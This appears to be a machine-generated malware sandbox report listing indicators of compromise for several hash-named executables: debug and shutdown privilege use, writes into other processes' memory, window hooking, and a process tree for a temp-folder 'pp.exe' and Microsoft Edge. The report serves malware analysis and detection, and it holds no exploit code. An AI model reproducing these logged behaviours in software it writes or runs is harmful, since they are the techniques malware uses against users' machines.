5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2672 OpenWith.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 21 IoCs
pid Process 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe Token: SeDebugPrivilege 2408 taskkill.exe Token: SeDebugPrivilege 412 powershell.exe Token: SeDebugPrivilege 2528 taskkill.exe Token: SeDebugPrivilege 5040 taskkill.exe Token: SeDebugPrivilege 5696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe Token: SeDebugPrivilege 5060 powershell.exe Token: SeDebugPrivilege 3008 taskkill.exe Token: SeDebugPrivilege 5444 taskkill.exe Token: SeDebugPrivilege 4560 taskkill.exe Token: SeDebugPrivilege 656 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe Token: SeDebugPrivilege 5020 powershell.exe Token: SeDebugPrivilege 5196 taskkill.exe Token: SeDebugPrivilege 5912 taskkill.exe Token: SeDebugPrivilege 5540 taskkill.exe Token: SeShutdownPrivilege 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 9799850382012470503 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: SeShutdownPrivilege 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 6937813002834471071 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 6937813002834471071 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 4294967295 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 29089088 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 17179869189 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 55834574848 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 10088152226412725265 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 10088085156211362662 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 10088199505404398254 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 10088215998067215043 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 10088071962066193740 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 10088075260600945994 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 10088078559139368256 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 10088088454743100754 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 10088091753277328744 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 10088128037165370794 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 10088184112239931891 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 10088063165974247353 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 10088069763043227597 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 10088076360112207809 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 10088082957185382357 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 10088096151327537149 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 9851624184872960 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 2251799813685248 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 3377699720527872 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 30680772461461504 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 5066549580791808 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 10088128037152879975 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 10088309456538762070 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 10088374327717657095 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 10088416109151779441 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 10088192908335709715 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 10088276471200283919 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 10088327048725855617 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 10088334745310330286 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 10088410611590429821 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 10088064265486007472 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 10088074161089215682 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 10088087355231370474 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 10088096151329098147 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 10088200604902738112 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 10088240187326844724 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 10088415009640205593 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 10088572239778794702 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 10088696484567265817 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe Token: 25614222880669696 5460 1001a8c7f33185217e6e1bdbb8dba9780d475da944684fb4bf1fc04809525887.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 5696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 5696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 656 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 656 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 1928 msedge.exe -
Suspicious use of SendNotifyMessage 47 IoCs
pid Process 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1728 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 5696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 5696 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe 656 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 656 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe 1928 msedge.exe -
Suspicious use of SetWindowsHookEx 64 IoCs
pid Process 2672 OpenWith.exe 2672 OpenWith.exe 2672 OpenWith.exe 2672 OpenWith.exe 2672 OpenWith.exe 2672 OpenWith.exe 2672 OpenWith.exe 2672 OpenWith.exe 2672 OpenWith.exe 2672 OpenWith.exe 2672 OpenWith.exe 2672 OpenWith.exe 2672 OpenWith.exe 2672 OpenWith.exe 2672 OpenWith.exe 2672 OpenWith.exe 2672 OpenWith.exe 2672 OpenWith.exe 2672 OpenWith.exe 2672 OpenWith.exe 2672 OpenWith.exe 2672 OpenWith.exe 2672 OpenWith.exe 2672 OpenWith.exe 2672 OpenWith.exe 2672 OpenWith.exe 2672 OpenWith.exe 2612 OpenWith.exe 2612 OpenWith.exe 2612 OpenWith.exe 2612 OpenWith.exe 2612 OpenWith.exe 2612 OpenWith.exe 2612 OpenWith.exe 2612 OpenWith.exe 2612 OpenWith.exe 2612 OpenWith.exe 2612 OpenWith.exe 2612 OpenWith.exe 2612 OpenWith.exe 2612 OpenWith.exe 2612 OpenWith.exe 2612 OpenWith.exe 2612 OpenWith.exe 2612 OpenWith.exe 2612 OpenWith.exe 2612 OpenWith.exe 2612 OpenWith.exe 2612 OpenWith.exe 2612 OpenWith.exe 2612 OpenWith.exe 2612 OpenWith.exe 2612 OpenWith.exe 2612 OpenWith.exe 2612 OpenWith.exe 2612 OpenWith.exe 2612 OpenWith.exe 2612 OpenWith.exe 2612 OpenWith.exe 2612 OpenWith.exe 2612 OpenWith.exe 2612 OpenWith.exe 2612 OpenWith.exe 2612 OpenWith.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5072 wrote to memory of 2452 5072 pp.exe 84 PID 5072 wrote to memory of 2452 5072 pp.exe 84 PID 1928 wrote to memory of 5032 1928 msedge.exe 90 PID 1928 wrote to memory of 5032 1928 msedge.exe 90 PID 1928 wrote to memory of 4676 1928 msedge.exe 91 PID 1928 wrote to memory of 4676 1928 msedge.exe 91 PID 1928 wrote to memory of 4676 1928 msedge.exe 91 PID 1928 wrote to memory of 4676 1928 msedge.exe 91 PID 1928 wrote to memory of 4676 1928 msedge.exe 91 PID 1928 wrote to memory of 4676 1928 msedge.exe 91 PID 1928 wrote to memory of 4676 1928 msedge.exe 91 PID 1928 wrote to memory of 4676 1928 msedge.exe 91 PID 1928 wrote to memory of 4676 1928 msedge.exe 91 PID 1928 wrote to memory of 4676 1928 msedge.exe 91 PID 1928 wrote to memory of 4676 1928 msedge.exe 91 PID 1928 wrote to memory of 4676 1928 msedge.exe 91 PID 1928 wrote to memory of 4676 1928 msedge.exe 91 PID 1928 wrote to memory of 4676 1928 msedge.exe 91 PID 1928 wrote to memory of 4676 1928 msedge.exe 91 PID 1928 wrote to memory of 4676 1928 msedge.exe 91 PID 1928 wrote to memory of 4676 1928 msedge.exe 91 PID 1928 wrote to memory of 4676 1928 msedge.exe 91 PID 1928 wrote to memory of 4676 1928 msedge.exe 91 PID 1928 wrote to memory of 4676 1928 msedge.exe 91 PID 1928 wrote to memory of 4676 1928 msedge.exe 91 PID 1928 wrote to memory of 4676 1928 msedge.exe 91 PID 1928 wrote to memory of 4676 1928 msedge.exe 91 PID 1928 wrote to memory of 4676 1928 msedge.exe 91 PID 1928 wrote to memory of 4676 1928 msedge.exe 91 PID 1928 wrote to memory of 4676 1928 msedge.exe 91 PID 1928 wrote to memory of 4676 1928 msedge.exe 91 PID 1928 wrote to memory of 4676 1928 msedge.exe 91 PID 1928 wrote to memory of 4676 1928 msedge.exe 91 PID 1928 wrote to memory of 4676 1928 msedge.exe 91 PID 1928 wrote to memory of 4676 1928 msedge.exe 91 PID 1928 wrote to memory of 4676 1928 msedge.exe 91 PID 1928 wrote to memory of 4676 1928 msedge.exe 91 PID 1928 wrote to memory of 4676 1928 msedge.exe 91 PID 1928 wrote to memory of 4676 1928 msedge.exe 91 PID 1928 wrote to memory of 4676 1928 msedge.exe 91 PID 1928 wrote to memory of 4676 1928 msedge.exe 91 PID 1928 wrote to memory of 4676 1928 msedge.exe 91 PID 1928 wrote to memory of 4676 1928 msedge.exe 91 PID 1928 wrote to memory of 4676 1928 msedge.exe 91 PID 1928 wrote to memory of 5088 1928 msedge.exe 92 PID 1928 wrote to memory of 5088 1928 msedge.exe 92 PID 1928 wrote to memory of 4324 1928 msedge.exe 93 PID 1928 wrote to memory of 4324 1928 msedge.exe 93 PID 1928 wrote to memory of 4324 1928 msedge.exe 93 PID 1928 wrote to memory of 4324 1928 msedge.exe 93 PID 1928 wrote to memory of 4324 1928 msedge.exe 93 PID 1928 wrote to memory of 4324 1928 msedge.exe 93 PID 1928 wrote to memory of 4324 1928 msedge.exe 93 PID 1928 wrote to memory of 4324 1928 msedge.exe 93 PID 1928 wrote to memory of 4324 1928 msedge.exe 93 PID 1928 wrote to memory of 4324 1928 msedge.exe 93 PID 1928 wrote to memory of 4324 1928 msedge.exe 93 PID 1928 wrote to memory of 4324 1928 msedge.exe 93 PID 1928 wrote to memory of 4324 1928 msedge.exe 93 PID 1928 wrote to memory of 4324 1928 msedge.exe 93 PID 1928 wrote to memory of 4324 1928 msedge.exe 93 PID 1928 wrote to memory of 4324 1928 msedge.exe 93 PID 1928 wrote to memory of 4324 1928 msedge.exe 93 PID 1928 wrote to memory of 4324 1928 msedge.exe 93
Processes
-
C:\Users\Admin\AppData\Local\Temp\pp.exe"C:\Users\Admin\AppData\Local\Temp\pp.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:5072 -
C:\Users\Admin\AppData\Local\Temp\pp.exe"C:\Users\Admin\AppData\Local\Temp\pp.exe"2⤵
- Loads dropped DLL
PID:2452
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1928 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff37f946f8,0x7fff37f94708,0x7fff37f947182⤵PID:5032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2232,5507560893636862681,9893145803666023862,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2264 /prefetch:22⤵PID:4676
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2232,5507560893636862681,9893145803666023862,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:5088
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2232,5507560893636862681,9893145803666023862,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2856 /prefetch:82⤵PID:4324
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,5507560893636862681,9893145803666023862,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:12⤵PID:1264
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,5507560893636862681,9893145803666023862,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:12⤵PID:4696
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,5507560893636862681,9893145803666023862,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4672 /prefetch:12⤵PID:4156
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,5507560893636862681,9893145803666023862,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4184 /prefetch:12⤵PID:1884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2232,5507560893636862681,9893145803666023862,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5268 /prefetch:82⤵PID:3620
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2232,5507560893636862681,9893145803666023862,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5268 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1580
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,5507560893636862681,9893145803666023862,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3924 /prefetch:12⤵PID:1404
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,5507560893636862681,9893145803666023862,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4832 /prefetch:12⤵PID:4704
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2232,5507560893636862681,9893145803666023862,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4160 /prefetch:82⤵PID:3632
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2232,5507560893636862681,9893145803666023862,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5364 /prefetch:82⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:2560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,5507560893636862681,9893145803666023862,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:12⤵PID:3500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,5507560893636862681,9893145803666023862,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5384 /prefetch:12⤵PID:3740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,5507560893636862681,9893145803666023862,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4196 /prefetch:12⤵PID:4820
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,5507560893636862681,9893145803666023862,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:12⤵PID:432
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,5507560893636862681,9893145803666023862,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5708 /prefetch:12⤵PID:2400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,5507560893636862681,9893145803666023862,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2608 /prefetch:12⤵PID:2092
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,5507560893636862681,9893145803666023862,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:12⤵PID:4408
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,5507560893636862681,9893145803666023862,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:12⤵PID:3308
-
-
